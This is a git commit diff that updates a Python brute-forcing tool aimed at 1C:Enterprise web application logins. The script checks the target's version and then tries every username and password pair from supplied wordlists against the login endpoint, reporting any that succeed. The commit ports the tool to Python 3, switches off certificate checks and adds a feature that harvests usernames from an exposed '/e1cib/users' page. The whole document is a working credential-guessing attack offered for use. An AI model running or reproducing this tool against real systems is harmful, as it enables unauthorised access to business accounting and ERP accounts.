starev-org · dinimus · Nov 10, 2020
diff --git a/1C-Web-bruter/1c-web-bruter.py b/1C-Web-bruter/1c-web-bruter.py
@@ -1,119 +1,137 @@
-#!/usr/bin/env python
+#!/usr/bin/python3
 
-from time import sleep, strftime
+from time import sleep,strftime
 import sys
 import argparse
 import signal
 import re
 import base64
+import urllib3
+
+urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
 
 try:
-    import requests
+	import requests
 except:
-    print("No required module. Install: pip install requests")
-    exit()
-
+	print("No required module. Install: pip install requests")
+	exit()
 
 # Print the current line on when terminated via ctrl-c
 def signal_handler(signal, frame):
-    sys.stdout.write('\r%-100s\r' % ' ')
-    print('\n\033[94mStopped at line: ' + str(pwd) + '\033[0m')
-    print("\r\033[94mBruteforce stopped at " + strftime("%d-%m-%Y %H:%M:%S %Z") + "\033[0m")
-    sys.exit(0)
-
-
+	sys.stdout.write('\r\033[K\r')
+	print('\n\033[94mStopped at line: ' + str(pwd) + '\033[0m')
+	print("\r\033[94mBruteforce stopped at " + strftime("%d-%m-%Y %H:%M:%S %Z") + "\033[0m")
+	sys.exit(0)
 signal.signal(signal.SIGINT, signal_handler)
 
 # PARSING ARGS
 
-parser = argparse.ArgumentParser(description='\t\033[1m\033[93m1C Web Application Bruteforcer\033[0m',
-                                 epilog='\033[93mExample:\033[0m ./1c-web-bruter.py http://10.2.3.4/buh users.txt pass.txt')
-parser.add_argument('Target', metavar='\033[94mtarget\033[0m', type=str,
-                    help='The target URI with directory of 1C webapp. Example: http://192.168.1.1/Tasker')
-# parser.add_argument('Version', metavar='\033[91mversion\033[0m', type=str, help='Version of 1C. ex 8.2.19.130')
+parser = argparse.ArgumentParser(description='\t\033[1m\033[93m1C Web Application Bruteforcer\033[0m',epilog='\033[93mExample:\033[0m ./1c-web-bruter.py http://10.2.3.4/buh users.txt pass.txt')
+parser.add_argument('Target', metavar='\033[94mtarget\033[0m', type=str, help='The target URI with directory of 1C webapp. Example: http://192.168.1.1/Tasker')
 parser.add_argument('Username', metavar='\033[94musers\033[0m', type=str, help='The usernames list')
 parser.add_argument('Wordlist', metavar='\033[94mpasswords\033[0m', type=str, help='The passwords list')
-parser.add_argument("--delay", type=int, help='Time in milliseconds between each request', default=5)
-parser.add_argument("--startat", type=int, help='Start at this line in the file', default=0)
-# parser.add_argument("--ignore-consecutive-empty", type=int, help='Ignore this many consec. empty lines before exiting', default=4)
-parser.add_argument("--ignore-invalid-certificate", type=bool, help='Ignore untrusted certs', default=True)
+parser.add_argument('-d', '--delay', type=int, help='Time in milliseconds between each request', dest='delay', default=5)
+parser.add_argument('-s', '--startat', type=int, help='Start at this line in the file', dest='startat', default=0)
+parser.add_argument('-g', "--gather", help="Gather usernames from '/e1cib/users' and add them into userlist", action='store_true', dest='gather', default=False)
+#parser.add_argument("--ignore-consecutive-empty", type=int, help='Ignore this many consec. empty lines before exiting', default=4)
 
 args = parser.parse_args()
 # END ARGS
 
 # GLOBAL VARS
 delay = args.delay
 target = args.Target
-# version = args.Version
 username = args.Username
 wordlist = args.Wordlist
 startAt = args.startat
+gather = args.gather
 success = 0
 version = 0
+users = []
 reseturl = target + '/en_US/e1cib/logout'
 resetdata = {'root': '{}'}
-# maxEmptyCount = args.ignore_consecutive_empty
-ignoreBadCerts = args.ignore_invalid_certificate
+#maxEmptyCount = args.ignore_consecutive_empty
 # END VARS
 
 print("\033[94mBruteforce started at " + strftime("%d-%m-%Y %H:%M:%S %Z") + "\033[0m\n")
 fuser = open(username, 'r')
 fpass = open(wordlist, 'r')
-usercount = len(re.findall(r"[\n']+?", open(username).read()))
+
+for i in fuser.read().splitlines():
+	users.append(i)
+
+# Gathering usernames
+if gather == True:
+	gath_users = []
+	resp = requests.get(target + '/en_US/e1cib/users', verify=False)
+	if len(resp.text) != None or len(resp.text) != 0:
+		for i in resp.text.splitlines():
+			gath_users.append(i)
+		all_users = users + gath_users
+		all_users = list(set(all_users))
+		all_users.sort()
+		f_new_users = open(username, 'w')
+		for item in all_users:
+			f_new_users.write("%s\n" % item)
+		f_new_users.close()
+else:
+	all_users = users
+# End of gathering
+
+usercount = len(all_users)
 passcount = len(re.findall(r"[\n']+?", open(wordlist).read()))
 print("\033[94mUserlist`s size: \033[93m" + str(usercount) + "\033[0m")
 print("\033[94mPasslist`s size: \033[93m" + str(passcount) + "\n\033[0m")
 
 # Version check and directory validation
-ver = requests.get(target + '/')
-verpage = ver.content
+ver = requests.get(target + '/', verify=False)
+verpage = ver.content.decode('utf-8')
 regex = r'([sysver=]+[0-9\.]+)'
-res = re.findall(regex, verpage)
+res = re.findall (regex, verpage)
 for vl in res:
-    if 'sysver=' in vl:
-        version = vl.split('=')[1]
+	if 'sysver=' in vl:
+		version = vl.split('=')[1]
 if version == 0:
-    print(
-        "\033[91m\033[1mCheck the \033[0m\033[93mtarget\033[0m \033[91m\033[1mparameter. 1C Web Application is not found on \033[0m\033[93m" + target + "\033[0m\n")
-    print("\r\033[94mBruteforce completed at " + strftime("%d-%m-%Y %H:%M:%S %Z") + "\033[0m")
-    sys.exit(0)
+	print("\033[91m\033[1mCheck the \033[0m\033[93mtarget\033[0m \033[91m\033[1mparameter. 1C Web Application is not found on \033[0m\033[93m" + target + "\033[0m\n")
+	print("\r\033[94mBruteforce completed at " + strftime("%d-%m-%Y %H:%M:%S %Z") + "\033[0m")
+	sys.exit(0)
 # End of check and validation
 
-for i in fuser.read().splitlines():
-    fpass.seek(0)
-    for j in fpass.read().splitlines():
-        cred = base64.b64encode(i + ':' + j)
-        pwd = i + ':' + j
-        url = target + '/en_US/e1cib/login?version=' + version + '&cred=' + cred + '&vl=en_US&clnId=84c3db7e-661b-9350-57ac-7164384e6c43'
-        http = requests.post(url)
-        if http.status_code == 400:
-            print("\033[91m\033[1mNo free license for new user's session. Try later.\033[0m\n")
-            print("\r\033[94mFound \033[0m\033[93m\033[1m" + str(success) + "\033[0m \033[94mpassword(s).\033[0m")
-            print("\033[94mBruteforce completed at " + strftime("%d-%m-%Y %H:%M:%S %Z") + "\033[0m")
-            sys.exit(0)
-        if http.status_code == 200:
-            print("\r\033[1m\033[92m" + pwd.ljust(100) + "\033[0m\r")
-            success += 1
-            # Reset session:
-            setcookie = http.headers['Set-Cookie']
-            cookie = setcookie.split(';')[0]
-            resetheader = {'Cookie': cookie}
-            requests.post(reseturl, headers=resetheader, json=resetdata)
-            # End reset session
-            break
-        sys.stdout.write('\r%-100s\r' % pwd)
-        sys.stdout.flush()
-        sleep(delay / 1000.0)
-#        while not pwd:
-#            emptyCount += 1
-#            if emptyCount > maxEmptyCount:
-#                sys.exit(0)
+for i in users:
+	fpass.seek(0)
+	for j in fpass.read().splitlines():
+		cred = base64.b64encode (bytes(i + ':' + j, 'utf-8')).decode('ascii')
+		pwd = i + ':' + j
+		url = target + '/en_US/e1cib/login?version=' + version + '&cred=' + cred + '&vl=en_US&clnId=84c3db7e-661b-9350-57ac-7164384e6c43'
+		http = requests.post(url, verify=False)
+		if http.status_code == 400:
+			print("\033[91m\033[1mNo free license for new user's session. Try later.\033[0m\n")
+			print("\r\033[94mFound \033[0m\033[93m\033[1m" + str(success) + "\033[0m \033[94mpassword(s).\033[0m")
+			print("\033[94mBruteforce completed at " + strftime("%d-%m-%Y %H:%M:%S %Z") + "\033[0m")
+			sys.exit(0)
+		if http.status_code == 200:
+			print("\r\033[1m\033[92m" + pwd.ljust(100) + "\033[0m\r")
+			success +=1
+			# Reset session: 
+			setcookie = http.headers['Set-Cookie']
+			cookie = setcookie.split(';')[0]
+			resetheader = {'Cookie': cookie}
+			requests.post(reseturl, headers=resetheader, json=resetdata, verify=False)
+			# End reset session
+			break
+		sys.stdout.write('\r%-100s\r' % pwd)
+		sys.stdout.flush()
+		sleep(delay / 1000.0)
+#		while not pwd:
+#			emptyCount += 1
+#			if emptyCount > maxEmptyCount:
+#				sys.exit(0)
 
 sys.stdout.write('\r%-100s\r' % ' ')
 if success == 0:
-    print("\r\033[93mPasswords not found. Try again using another passlist.\033[0m")
+	print("\r\033[93mPasswords not found. Try again using another passlist.\033[0m")
 else:
-    print("\n\033[94mFound \033[0m\033[93m\033[1m" + str(success) + "\033[0m \033[94mpassword(s).\033[0m")
+	print("\n\033[94mFound \033[0m\033[93m\033[1m" + str(success) + "\033[0m \033[94mpassword(s).\033[0m")
 print("\r\033[94mBruteforce completed at " + strftime("%d-%m-%Y %H:%M:%S %Z") + "\033[0m")
 fuser.close()
-fpass.close()
+fpass.close()